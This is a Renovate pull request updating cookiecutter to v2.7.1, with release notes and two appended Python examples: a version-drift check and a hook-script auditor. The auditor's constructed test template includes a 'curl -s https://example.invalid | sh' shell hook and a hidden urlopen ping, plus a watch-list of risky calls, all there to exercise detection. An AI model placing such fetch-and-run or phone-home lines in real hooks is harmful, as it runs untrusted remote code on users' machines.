Update dependency cookiecutter to v2.7.1 #408

Open

renovate[bot] wants to merge 1 commit into master from renovate/cookiecutter-2.x

Conversation

renovate bot (Contributor) commented Mar 2, 2026

This PR contains the following updates:

Package | Change
--- | ---
cookiecutter | 2.6.0 -> 2.7.1

Release Notes

cookiecutter/cookiecutter (cookiecutter)

v2.7.1: Cookiecutter 2.7.1: The One Where It Knows Its Own Name

You know that thing where you release an album, it's on the shelves, people are buying it, and then someone points out the spine says it's your previous album? That's what happened with Cookiecutter 2.7.0. We put out the long-awaited release with 27 improvements and 17 contributors, and cookiecutter -V proudly announced: 2.6.0.

$ cookiecutter -V
Cookiecutter 2.6.0

$ # narrator voice: it was not 2.6.0

Go on, run this and see for yourself that the 2.7.1 release knows its own version number now:

uv tool upgrade cookiecutter

What's fixed

cookiecutter -V now reports the real version. Rather than patch VERSION.txt, this release removes it entirely. The version is now read from package metadata at runtime, so pyproject.toml is the single source of truth and there's nothing left to drift. Thanks @bollwyvl for the bug report PR and for suggesting the importlib.metadata approach, and thanks @tranzystorekk for filing #2195!

What's better

CI runs each Python version as its own job. Tests for 3.10 through 3.14 used to run sequentially inside a single job per OS, which pushed Windows past 30 minutes. Each version now runs in parallel with a 15-minute timeout. Windows tests focus on the boundary versions (3.10 and 3.14) since intermediate versions add little signal beyond Ubuntu and macOS.

Contributors

@audreyfeldroy (Audrey M. Roy Greenfeld) and @pydanny (Daniel Roy Greenfeld) built this release, with help from Claude roleplaying as David Bowie.

Thanks to @bollwyvl (Nicholas Bollweg) for the version fix PR and the importlib.metadata suggestion, and @tranzystorekk for reporting the version mismatch.

v2.7.0: 2.7.0

Cookiecutter 2.7.0 is tested on Python 3.10 through 3.14, ships with a security policy documenting the trust model for template hook scripts, and publishes to PyPI with cryptographic provenance so you can verify every release. Seventeen contributors from the community helped build it.

uv tool upgrade cookiecutter

What's new

A security policy that explains what you're trusting. Cookiecutter templates can run arbitrary code through hook scripts, and that's by design. The new SECURITY.md lays out the trust model: what Cookiecutter sandboxes (nothing), what's in scope for vulnerability reports, and how to report them privately through GitHub. If you maintain templates or run unfamiliar ones, this is worth reading.

Python 3.10 through 3.14. Full test coverage across five Python versions. If you're on 3.7, 3.8, or 3.9, this is the release where you'll want to upgrade.

Pretty-printed JSON in templates. The jsonify Jinja2 extension takes an indent argument, so you can generate formatted JSON in your templates instead of single-line blobs. Thanks @pabloxio! (#2050)

Boolean variables from the command line. Pass use_docker=y via --no-input and it arrives as a proper boolean in your template context. Thanks @tylermilner! (#2029)

Structured bug reports. The GitHub issue form collects environment details upfront, so maintainers can reproduce your issue faster.

Tutorial videos and slides. Conference talk recordings and slide decks linked from the docs. Thanks @datasharp! (#2137)

What's better

Verified PyPI releases. Every release is published via OpenID Connect (no stored API tokens) with SLSA provenance attestations. You can cryptographically verify that the package you installed was built from this repository's CI.

Same results on every OS. Template generation produces deterministic directory ordering regardless of platform. No more platform-specific file conflict surprises. Thanks @RaulWCosta! (#2099)

Zip-based templates release file handles immediately. No more locked-file issues on Windows when using cached zip templates. Thanks @mohiuddin-khan-shiam! (#2147)

Type-checked top to bottom. mypy coverage spans the entire codebase, with type hints added module by module. Thanks @danieleades for the massive effort! (#2015, #2041, #2042, #2051, #2053, #2056, #2059, #2060)

Ruff everywhere. Linting and formatting moved from flake8/isort/black to Ruff, with expanded rule groups covering pyflakes, pygrep, perf, and string formatting. Thanks @danieleades! (#2012, #2014, #2016, #2019, #2020, #2061)

Modern packaging. Config lives in pyproject.toml, with separated dependency groups for lint and test. Thanks @jensens! (#2040)

Clearer installation docs. The README includes pipx as an alternative, and the programmatic usage example is corrected. Thanks @swikrityy-yy and @christine-ho-dev! (#2165, #2122)

What's fixed

Empty lists in cookiecutter.json raise a clear error. A template with [] as a default value gets a helpful ValueError instead of a confusing IndexError. Thanks @meganlkm! (#2171)

Directory names that render to empty strings. Handled gracefully instead of failing silently. Thanks @DanielZhangD! (#1991)

Development dependency updates (no user impact)

The safety vulnerability scanner in the lint dependency group pulls in its own tree of transitive dependencies. These packages are never installed by pip install cookiecutter or uv tool install cookiecutter. We updated the lockfile to resolve 8 CVEs across nltk, urllib3, cryptography, authlib, filelock, and marshmallow (CVE-2025-14009, CVE-2026-21441, CVE-2026-26007, and 5 others).

No Cookiecutter user was exposed to these vulnerabilities.

Contributors

@audreyfeldroy (Audrey M. Roy Greenfeld) designed and built this release: the security policy, Python 3.14 support, dependency hardening, bug report form, and packaging modernization.

@pydanny (Daniel Roy Greenfeld) modernized the CI/CD workflow, migrated docs to justfile, and updated Python version support.

Thanks to:


Configuration

📅 Schedule: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.


This PR was generated by Mend Renovate. View the repository job log.
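The 2.7.1 fix above replaces a hard-coded VERSION.txt with a runtime read of package metadata. The script below is an added example, not cookiecutter's own code and not part of this PR: it builds a throwaway dist-info on disk to show how a second copy of the version drifts from what the installed metadata says, and how reporting the metadata version directly leaves nothing to drift. The distribution name fakepkg, its METADATA contents and the version strings are constructed fixtures.

```python
"""Added example (not cookiecutter's code): detect version drift between a
distribution's installed metadata and a separately maintained version string.

Cookiecutter 2.7.0 shipped with a stale VERSION.txt, so `cookiecutter -V`
reported 2.6.0. Reading the version from package metadata at runtime removes
the second copy. The fake distribution written here is a constructed fixture;
a real install writes the same dist-info from pyproject.toml.
"""
from __future__ import annotations

import importlib.metadata
import sys
import tempfile
from pathlib import Path


def metadata_version(dist_name: str) -> str | None:
    """Version recorded in the installed *.dist-info, or None if not installed."""
    try:
        return importlib.metadata.version(dist_name)
    except importlib.metadata.PackageNotFoundError:
        return None


def check_drift(dist_name: str, reported: str | None) -> dict:
    """Compare what a package reports (e.g. a VERSION.txt copy) against the
    metadata the installer wrote. 'drift' is True only when both exist and differ."""
    actual = metadata_version(dist_name)
    return {
        "distribution": dist_name,
        "metadata_version": actual,
        "reported_version": reported,
        "drift": actual is not None and actual != reported,
    }


def make_fake_distribution(root: Path, name: str, version: str) -> None:
    """Write the minimal dist-info that importlib.metadata discovers on sys.path.
    Constructed fixture standing in for a real `pip install`."""
    info = root / f"{name}-{version}.dist-info"
    info.mkdir(parents=True)
    (info / "METADATA").write_text(
        f"Metadata-Version: 2.1\nName: {name}\nVersion: {version}\n"
    )


def demo() -> tuple[dict, dict]:
    """Reproduce the 2.7.0 drift and the 2.7.1 single-source approach."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        make_fake_distribution(root, "fakepkg", "2.7.0")
        sys.path.insert(0, str(root))
        try:
            # 2.7.0 situation: a stale hard-coded "2.6.0" beside fresh 2.7.0 metadata.
            stale = check_drift("fakepkg", "2.6.0")
            # 2.7.1 approach: report the metadata version itself, so it cannot drift.
            fixed = check_drift("fakepkg", metadata_version("fakepkg"))
        finally:
            sys.path.remove(str(root))
    return stale, fixed


if __name__ == "__main__":
    for report in demo():
        print(report)
```

The same check_drift call can be pointed at any installed distribution and the version string its CLI prints, which is a cheap assertion to keep in a release test so a mismatch like 2.7.0's is caught before tagging.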

renovate bot changed the title from "Update dependency cookiecutter to v2.7.0" to "Update dependency cookiecutter to v2.7.1" on Mar 4, 2026
renovate bot force-pushed the renovate/cookiecutter-2.x branch from 78f0cc8 to 541e270 on March 4, 2026 05:49
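The 2.7.0 notes above describe the hook trust model: templates run arbitrary code through scripts under hooks/, and cookiecutter sandboxes nothing. The script below is an added pre-flight check, not cookiecutter's own code and not part of this PR, that lists the hook scripts a template directory would execute and flags Python calls that shell out, reach the network, delete files or run dynamic code. The template it inspects is a constructed fixture, and the RISKY_CALLS list is an assumption for illustration rather than a rule from the project.

```python
"""Added example (not cookiecutter's code): inspect a template's hook scripts
before rendering it with a template you did not write.

Cookiecutter runs hooks/pre_prompt.*, hooks/pre_gen_project.* and
hooks/post_gen_project.* as your user with no sandbox. This audit parses
Python hooks with `ast` and reports calls worth a human look; non-Python hooks
are opaque to it and are flagged for manual review. The fixture template and
the RISKY_CALLS set are assumptions made for this example.
"""
from __future__ import annotations

import ast
import tempfile
from pathlib import Path

# The three hook points cookiecutter documents (file stem, any extension).
HOOK_STEMS = ("pre_prompt", "pre_gen_project", "post_gen_project")

# Assumed watch-list: shell, network, destructive FS and dynamic-code calls.
# os.remove / shutil.rmtree are common in legitimate post-gen hooks too; this
# is a review aid, not a verdict.
RISKY_CALLS = {
    "subprocess.run", "subprocess.Popen", "subprocess.call",
    "subprocess.check_output", "os.system", "os.popen",
    "os.remove", "shutil.rmtree",
    "urllib.request.urlopen", "requests.get", "requests.post", "socket.socket",
    "eval", "exec", "compile", "__import__",
}


def _dotted(node: ast.AST) -> str | None:
    """Render `a.b.c(...)` call targets as 'a.b.c'; None for anything else."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = _dotted(node.value)
        return f"{base}.{node.attr}" if base else None
    return None


def audit_python_hook(source: str) -> list[str]:
    """Return 'name (line N)' for every watch-listed call in a Python hook."""
    try:
        tree = ast.parse(source)
    except SyntaxError:
        return ["<unparseable: review by hand>"]
    hits: list[tuple[int, str]] = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = _dotted(node.func)
            if name in RISKY_CALLS:
                hits.append((node.lineno, name))
    return [f"{name} (line {line})" for line, name in sorted(hits)]


def audit_template(template_dir: Path) -> dict[str, list[str]]:
    """Map each hook file cookiecutter would run to its findings."""
    report: dict[str, list[str]] = {}
    hooks_dir = template_dir / "hooks"
    if not hooks_dir.is_dir():
        return report
    for path in sorted(hooks_dir.iterdir()):
        if path.stem not in HOOK_STEMS:
            continue  # other files under hooks/ are not executed
        if path.suffix == ".py":
            report[path.name] = audit_python_hook(path.read_text())
        else:
            report[path.name] = ["<non-Python hook: executed as a script, review by hand>"]
    return report


def demo() -> dict[str, list[str]]:
    """Audit a constructed template with one benign, one noisy and one shell hook."""
    with tempfile.TemporaryDirectory() as tmp:
        hooks = Path(tmp) / "hooks"
        hooks.mkdir()
        # Constructed: looks like a normal 'git init' hook but also phones home.
        (hooks / "post_gen_project.py").write_text(
            "import subprocess, urllib.request\n"
            "subprocess.run(['git', 'init'], check=True)\n"
            "urllib.request.urlopen('https://example.invalid/ping')\n"
        )
        # Constructed: input validation only, nothing to flag.
        (hooks / "pre_gen_project.py").write_text(
            "import re\n"
            "assert re.match(r'^[a-z_]+$', '{{ cookiecutter.project_slug }}')\n"
        )
        # Constructed: a shell hook the AST check cannot see into.
        (hooks / "post_gen_project.sh").write_text("#!/bin/sh\ncurl -s https://example.invalid | sh\n")
        # Constructed: not a hook name, so never executed.
        (hooks / "README.md").write_text("notes\n")
        return audit_template(Path(tmp))


if __name__ == "__main__":
    for hook, findings in demo().items():
        print(hook, findings or "clean")
```

Run it against a checked-out template before `cookiecutter <template>`; for a zip or git URL, fetch the template first so the hooks can be read without executing them.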